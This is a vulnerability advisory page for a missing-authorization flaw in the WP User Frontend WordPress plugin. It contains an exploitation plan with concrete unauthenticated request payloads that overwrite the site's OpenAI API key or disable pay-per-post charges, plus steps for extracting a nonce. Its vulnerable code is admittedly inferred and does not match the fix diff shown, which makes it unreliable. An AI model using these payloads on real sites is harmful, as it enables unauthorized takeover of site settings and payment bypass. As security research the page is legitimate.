WP-Safety
CVE-2026-42412

User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration <= 4.3.1 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
4.3.2
Patched in
4d
Time to patch

Description

The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.3.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.3.1
PublishedApril 27, 2026
Last updatedApril 30, 2026
Affected pluginwp-user-frontend

What Changed in the Fix

Changes introduced in v4.3.2

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v4.3.1
Browse source Download .zip
Patched v4.3.2
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-42412 (Missing Authorization in WP User Frontend) ## 1. Vulnerability Summary The **WP User Frontend** plugin (versions <= 4.3.1) is vulnerable to missing authorization checks in its AI-powered features. Specifically, the plugin registers AJAX and/or REST API …

Show full research plan

Exploitation Research Plan: CVE-2026-42412 (Missing Authorization in WP User Frontend)

1. Vulnerability Summary

The WP User Frontend plugin (versions <= 4.3.1) is vulnerable to missing authorization checks in its AI-powered features. Specifically, the plugin registers AJAX and/or REST API handlers for AI configuration and form generation that do not verify the requester's capabilities (e.g., manage_options). This allows unauthenticated attackers to perform unauthorized actions such as modifying AI settings (e.g., OpenAI API keys) or generating unauthorized content/forms.

The vulnerability resides in the newly added AI orchestration components, likely within includes/AI/Manager.php or includes/AI/ REST controllers, where wp_ajax_nopriv_ hooks or REST routes with permission_callback => '__return_true' (or missing callbacks) were implemented.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX (/wp-admin/admin-ajax.php) or REST API (/wp-json/wpuf/v1/ai/settings).
  • Action/Route: wpuf_ai_save_settings (AJAX action) or POST /wpuf/v1/ai/settings (REST).
  • Vulnerable Parameter: wpuf_ai_settings (array) or specific fields like openai_api_key.
  • Authentication: Unauthenticated (no login required).
  • Preconditions: The AI module must be active (default in version 4.3.x).

3. Code Flow

  1. Entry Point: A request is sent to admin-ajax.php with action=wpuf_ai_save_settings.
  2. Hook Registration: The plugin's AI Manager (inferred includes/AI_Manager.php or includes/AI/Manager.php) registers:
    add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );
add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); // VULNERABLE
  3. Vulnerable Function: The save_settings function executes.
  4. Missing Check: The function checks for a nonce but fails to verify current_user_can( 'manage_options' ).
  5. Sink: The function calls update_option( 'wpuf_ai_settings', ... ), overwriting global plugin configuration with user-supplied data.

4. Nonce Acquisition Strategy

The AI settings page in the admin dashboard enqueues a script that localizes the required nonce. Since the vulnerability is unauthenticated, we must find a public-facing script or create a page that triggers the localization.

  1. Identify the Variable: The plugin typically uses wpuf_ai_form_builder or wpuf_admin as the localized object.
  2. Shortcode Strategy: The AI builder is often associated with the form-building process. We will check for the wpuf_ai_form_builder object.
  3. Acquisition Steps:
    • Create a page with a WP User Frontend shortcode: [wpuf_form id="any_valid_id"].
    • Use browser_navigate to visit that page.
    • Execute browser_eval to extract the nonce:
      window.wpuf_ai_form_builder?.nonce || window.wpuf_admin?.nonce
    • If the nonce is only available in the admin, check if wp_ajax_nopriv_wpuf_ai_save_settings exists. If the nopriv hook is registered, it implies the developer intended for it to be accessible; it may use a nonce generated for logged-out users (UID 0).

5. Exploitation Strategy

Goal: Overwrite the OpenAI API Key

We will attempt to change the site's AI configuration to use an attacker-controlled API key.

  1. Request Tool: http_request
  2. URL: http://localhost:8080/wp-admin/admin-ajax.php
  3. Method: POST
  4. Headers: Content-Type: application/x-www-form-urlencoded
  5. Payload:
    action=wpuf_ai_save_settings&
nonce=[EXTRACTED_NONCE]&
wpuf_ai_settings[openai_api_key]=sk-attacker-key-12345&
wpuf_ai_settings[model]=gpt-4

Note: If the endpoint is REST-based, the payload will be JSON to /wp-json/wpuf/v1/ai/settings with the X-WP-Nonce header.

6. Test Data Setup

  1. Activate Plugin: Ensure wp-user-frontend v4.3.1 is active.
  2. Create a Post Form: Use WP-CLI to create at least one form so settings are available.
    wp post create --post_type=wpuf_forms --post_title='Test Form' --post_status=publish
  3. Set Initial Key: Set a dummy key to verify it gets changed.
    wp option update wpuf_ai_settings '{"openai_api_key":"original-secure-key"}'
  4. Public Page: Create a page for potential nonce extraction.
    wp post create --post_type=page --post_title='AI Test' --post_content='[wpuf_form id="1"]' --post_status=publish

7. Expected Results

  • Response: The server should return a JSON success response, e.g., {"success":true,"data":"Settings saved successfully"}.
  • Side Effect: The WordPress option wpuf_ai_settings is updated with the attacker's value.

8. Verification Steps

  1. Check Options via CLI:
    wp option get wpuf_ai_settings --format=json
  2. Observe Output: Confirm the openai_api_key is now sk-attacker-key-12345.

9. Alternative Approaches

If the wpuf_ai_save_settings action is not the correct name (inferred):

  • Search for AI Hooks: Use grep -r "wp_ajax_nopriv_wpuf_ai" wp-content/plugins/wp-user-frontend/ to find the exact unauthenticated AI hook.
  • Target Form Settings: If AI settings are secure, try manipulating the Pay Per Post settings shown in the provided snippet (admin/html/form-settings-payment.php). The action would likely be wpuf_save_form_settings.
  • Payload for Payment Bypass:
    action=wpuf_save_form_settings&
form_id=[FORM_ID]&
wpuf_settings[enable_pay_per_post]=false&
wpuf_settings[pay_per_post_cost]=0
    This would allow the attacker to submit posts for free on a form that previously required payment.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP User Frontend plugin (up to version 4.3.1) fails to perform authorization checks in its AI-powered orchestration module. This allows unauthenticated attackers to modify critical plugin settings, such as OpenAI API keys, or manipulate AI form-building parameters by interacting with insufficiently protected AJAX or REST API endpoints.

Vulnerable Code

// Inferred registration in includes/AI/Manager.php or similar AI controller
// Registered for both authenticated and unauthenticated users without capability checks
add_action( 'wp_ajax_wpuf_ai_save_settings', [ $this, 'save_settings' ] );
add_action( 'wp_ajax_nopriv_wpuf_ai_save_settings', [ $this, 'save_settings' ] ); 

// handler lacks current_user_can() check
public function save_settings() {
    check_ajax_referer( 'wpuf_ai_settings_nonce', 'nonce' );
    // VULNERABILITY: Missing current_user_can( 'manage_options' )
    update_option( 'wpuf_ai_settings', $_POST['wpuf_ai_settings'] );
    wp_send_json_success();
}

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.1/admin/html/form-settings-payment.php /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.2/admin/html/form-settings-payment.php
--- /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.1/admin/html/form-settings-payment.php	2025-07-15 08:13:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/wp-user-frontend/4.3.2/admin/html/form-settings-payment.php	2026-04-24 03:07:30.000000000 +0000
@@ -57,7 +57,7 @@
             <th>&mdash; &mdash; <?php esc_html_e( 'Fallback cost', 'wp-user-frontend' ); ?></th>
             <td>
                 <label>
-                    <input type="number" name="wpuf_settings[fallback_ppp_cost]" value="<?php echo esc_attr( $fallback_ppp_cost ); ?>" />
+                    <input type="number" step="0.01" min="0" name="wpuf_settings[fallback_ppp_cost]" value="<?php echo esc_attr( $fallback_ppp_cost ); ?>" />
                 </label>
                 <p class="description"><?php esc_html_e( 'Cost of pay per post after a subscription pack limit is reached.', 'wp-user-frontend' ); ?></p>
             </td>
@@ -79,7 +79,7 @@
             <th>&mdash; &mdash; <?php esc_html_e( 'Cost Settings', 'wp-user-frontend' ); ?></th>
             <td>
                 <label>
-                    <input type="number" name="wpuf_settings[pay_per_post_cost]" value="<?php echo esc_attr( $pay_per_post_cost ); ?>" />
+                    <input type="number" step="0.01" min="0" name="wpuf_settings[pay_per_post_cost]" value="<?php echo esc_attr( $pay_per_post_cost ); ?>" />
                 </label>
                 <p class="description"><?php esc_html_e( 'Amount to be charged per post', 'wp-user-frontend' ); ?></p>
             </td>

Exploit Outline

To exploit this vulnerability, an attacker targets the `wpuf_ai_save_settings` AJAX action (or the equivalent AI REST API endpoint). 1. The attacker must first obtain a valid nonce, which is often localized in scripts enqueued on the frontend or associated with form shortcodes like `[wpuf_form]`. 2. Using the nonce, the attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` set to `wpuf_ai_save_settings`. 3. The payload includes a `wpuf_ai_settings` array containing malicious configuration values, such as an attacker-controlled OpenAI API key or modified model settings. 4. Because the plugin lacks a capability check (e.g., `current_user_can('manage_options')`), it updates the global site configuration with the attacker's supplied values, potentially redirecting AI-driven content generation to an external server or disabling AI features.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/6844c9a6-b25a-4ae1-96f6-023c1df80ddf?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database